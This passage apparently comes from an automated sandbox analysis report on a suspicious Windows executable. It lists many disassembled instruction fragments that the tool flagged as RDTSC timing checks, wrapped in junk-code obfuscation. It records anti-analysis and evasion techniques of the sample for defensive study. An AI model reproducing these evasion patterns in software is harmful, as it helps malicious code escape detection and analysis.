0x0000005c js 00007FBBF10EEFA8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jnc 00007FBBF10EEF96h 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685C26 second address: 685C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FBBF0522A56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685CE6 second address: 685CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68CF99 second address: 68D032 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF0522A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FBBF0522A5Ah 0x00000011 nop 0x00000012 jmp 00007FBBF0522A69h 0x00000017 push 00000000h 0x00000019 mov ebx, eax 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FBBF0522A58h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 push esi 0x00000038 push eax 0x00000039 jmp 00007FBBF0522A5Fh 0x0000003e pop edi 0x0000003f pop ebx 0x00000040 push edx 0x00000041 or dword ptr [ebp+122D21F7h], ecx 0x00000047 pop ebx 0x00000048 xchg eax, esi 0x00000049 jmp 00007FBBF0522A5Ah 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FBBF0522A5Ah 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68DFA5 second address: 68E000 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 sub ebx, dword ptr [ebp+122D29CEh] 0x0000000e push 00000000h 0x00000010 sub ebx, 767091CAh 0x00000016 mov dword ptr [ebp+122D28DEh], edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FBBF10EEF98h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007FBBF10EEFA1h 0x0000003d movzx ebx, ax 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68E000 second address: 68E01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF0522A63h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68E01C second address: 68E020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686DE4 second address: 686DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688DF1 second address: 688DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692153 second address: 692159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692159 second address: 69215D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 693224 second address: 69322D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689EA3 second address: 689EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 689EA9 second address: 689F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub edi, dword ptr [ebp+122D2BDFh] 0x0000000f mov ebx, dword ptr [ebp+122D1EA3h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push ebx 0x0000001d mov edi, 13FE1D56h 0x00000022 pop ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a ja 00007FBBF0522A5Eh 0x00000030 pushad 0x00000031 mov edx, dword ptr [ebp+122D3726h] 0x00000037 popad 0x00000038 mov dword ptr [ebp+122D2834h], edx 0x0000003e mov eax, dword ptr [ebp+122D0191h] 0x00000044 push FFFFFFFFh 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007FBBF0522A58h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 pushad 0x00000061 mov cx, 1BA8h 0x00000065 mov dx, ax 0x00000068 popad 0x00000069 jno 00007FBBF0522A62h 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 pushad 0x00000074 popad 0x00000075 push edi 0x00000076 pop edi 0x00000077 popad 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68AF6D second address: 68AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 jo 00007FBBF10EEF9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FBBF10EEF96h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68B06F second address: 68B074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6987D5 second address: 6987E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBBF10EEF96h 0x0000000a pop esi 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F251 second address: 68F255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F255 second address: 68F2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jmp 00007FBBF10EEFA0h 0x0000000d pop ecx 0x0000000e nop 0x0000000f mov dword ptr [ebp+1246A66Eh], esi 0x00000015 mov bx, 7F03h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 add di, 2D9Bh 0x00000025 xor edi, 1C7F6C46h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jng 00007FBBF10EEF9Ch 0x00000038 sub dword ptr [ebp+122D28DEh], ecx 0x0000003e mov eax, dword ptr [ebp+122D07A9h] 0x00000044 push 00000000h 0x00000046 push edx 0x00000047 call 00007FBBF10EEF98h 0x0000004c pop edx 0x0000004d mov dword ptr [esp+04h], edx 0x00000051 add dword ptr [esp+04h], 0000001Ch 0x00000059 inc edx 0x0000005a push edx 0x0000005b ret 0x0000005c pop edx 0x0000005d ret 0x0000005e mov dword ptr [ebp+1246A66Eh], edi 0x00000064 mov di, F23Ah 0x00000068 push FFFFFFFFh 0x0000006a mov bh, dh 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FBBF10EEF9Ch 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F2E5 second address: 68F303 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBF0522A58h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBBF0522A5Fh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F303 second address: 68F315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEF9Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6913A8 second address: 6913AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6913AE second address: 6913B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6922A5 second address: 6922AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6922AB second address: 6922B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6945CE second address: 6945D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 695561 second address: 695577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF10EEFA2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69E7B0 second address: 69E7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBF0522A67h 0x0000000a jmp 00007FBBF0522A65h 0x0000000f jo 00007FBBF0522A5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A40E7 second address: 6A40ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7A6B second address: 6A7A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7A6F second address: 6A7A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A85E9 second address: 6A860C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBF0522A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnp 00007FBBF0522A56h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jnp 00007FBBF0522A56h 0x0000001c jnp 00007FBBF0522A56h 0x00000022 pop edi 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A87A4 second address: 6A87AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBBF10EEF96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A87AE second address: 6A87C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FBBF0522A60h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A87C7 second address: 6A87CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A87CD second address: 6A87D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE394 second address: 6AE3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBBF10EEFA3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FBBF10EEF98h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE3B5 second address: 6AE3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE3BB second address: 6AE3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE3BF second address: 6AE3C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE3C3 second address: 6AE3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBBF10EEF96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBBF10EEFA0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE3E1 second address: 6AE3E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD045 second address: 6AD066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FBBF10EEFA5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD1B6 second address: 6AD1CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBBF0522A56h 0x00000009 jnp 00007FBBF0522A56h 0x0000000f popad 0x00000010 jg 00007FBBF0522A5Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD83C second address: 6AD84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FBBF10EEF96h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADAE1 second address: 6ADAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FBBF0522A5Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B6CF second address: 67B6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA45 second address: 67BA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBF0522A61h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA64 second address: 67BA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BA69 second address: 4CE9E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FBBF0522A56h 0x00000009 jmp 00007FBBF0522A65h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 or dh, FFFFFFEEh 0x00000015 push dword ptr [ebp+122D0A05h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FBBF0522A58h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 xor dword ptr [ebp+122D337Ch], edi 0x0000003b call dword ptr [ebp+122D2892h] 0x00000041 pushad 0x00000042 mov dword ptr [ebp+122D285Fh], eax 0x00000048 xor eax, eax 0x0000004a sub dword ptr [ebp+122D285Fh], edx 0x00000050 mov edx, dword ptr [esp+28h] 0x00000054 stc 0x00000055 mov dword ptr [ebp+122D2DDFh], eax 0x0000005b jmp 00007FBBF0522A62h 0x00000060 mov esi, 0000003Ch 0x00000065 sub dword ptr [ebp+122D3825h], eax 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f or dword ptr [ebp+122D3825h], ecx 0x00000075 lodsw 0x00000077 xor dword ptr [ebp+122D285Fh], edi 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 pushad 0x00000082 jg 00007FBBF0522A59h 0x00000088 mov dx, ax 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 jmp 00007FBBF0522A5Dh 0x00000095 nop 0x00000096 push esi 0x00000097 push eax 0x00000098 push edx 0x00000099 jp 00007FBBF0522A56h 0x0000009f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BB45 second address: 67BB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BB4A second address: 67BB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BB50 second address: 4CE9E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ecx, 678B611Ah 0x00000011 push dword ptr [ebp+122D0A05h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FBBF10EEF98h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D2D77h] 0x00000037 call dword ptr [ebp+122D2892h] 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D285Fh], eax 0x00000044 xor eax, eax 0x00000046 sub dword ptr [ebp+122D285Fh], edx 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 stc 0x00000051 mov dword ptr [ebp+122D2DDFh], eax 0x00000057 jmp 00007FBBF10EEFA2h 0x0000005c mov esi, 0000003Ch 0x00000061 sub dword ptr [ebp+122D3825h], eax 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b or dword ptr [ebp+122D3825h], ecx 0x00000071 lodsw 0x00000073 xor dword ptr [ebp+122D285Fh], edi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d pushad 0x0000007e jg 00007FBBF10EEF99h 0x00000084 mov dx, ax 0x00000087 popad 0x00000088 mov ebx, dword ptr [esp+24h] 0x0000008c jmp 00007FBBF10EEF9Dh 0x00000091 nop 0x00000092 push esi 0x00000093 push eax 0x00000094 push edx 0x00000095 jp 00007FBBF10EEF96h 0x0000009b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BD3F second address: 67BD5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBF0522A69h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BDE6 second address: 67BDF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBF10EEF9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BF40 second address: 67BF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BF46 second address: 67BF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67BF4E second address: 67BF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C52D second address: 67C588 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBF10EEF96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FBBF10EEF98h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov dword ptr [ebp+122D21E2h], ecx 0x0000001c push 0000001Eh 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FBBF10EEF98h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 jmp 00007FBBF10EEFA3h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jnp 00007FBBF10EEF96h 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 popad 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C6CE second address: 67C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C6D4 second address: 67C6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C9EB second address: 67C9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FBBF0522A56h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C9FD second address: 67CA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CA01 second address: 663B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov edi, 4BD7094Fh 0x0000000d call dword ptr [ebp+122D23CAh] 0x00000013 jbe 00007FBBF0522A6Ah 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663B98 second address: 663B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663B9E second address: 663BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBBF0522A56h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FBBF0522A70h 0x00000012 jmp 00007FBBF0522A64h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1DBA second address: 6B1DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBF10EEFA4h 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1DD3 second address: 6B1DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1DD9 second address: 6B1DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2202 second address: 6B2206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B266F second address: 6B2674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B27CA second address: 6B27D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4401 second address: 6B4405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8963 second address: 6B8969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBC82 second address: 6BBC8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBC8E second address: 6BBC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBC92 second address: 6BBC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FB5 second address: 6C0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FBF second address: 6C0FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BFDB9 second address: 6BFDBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
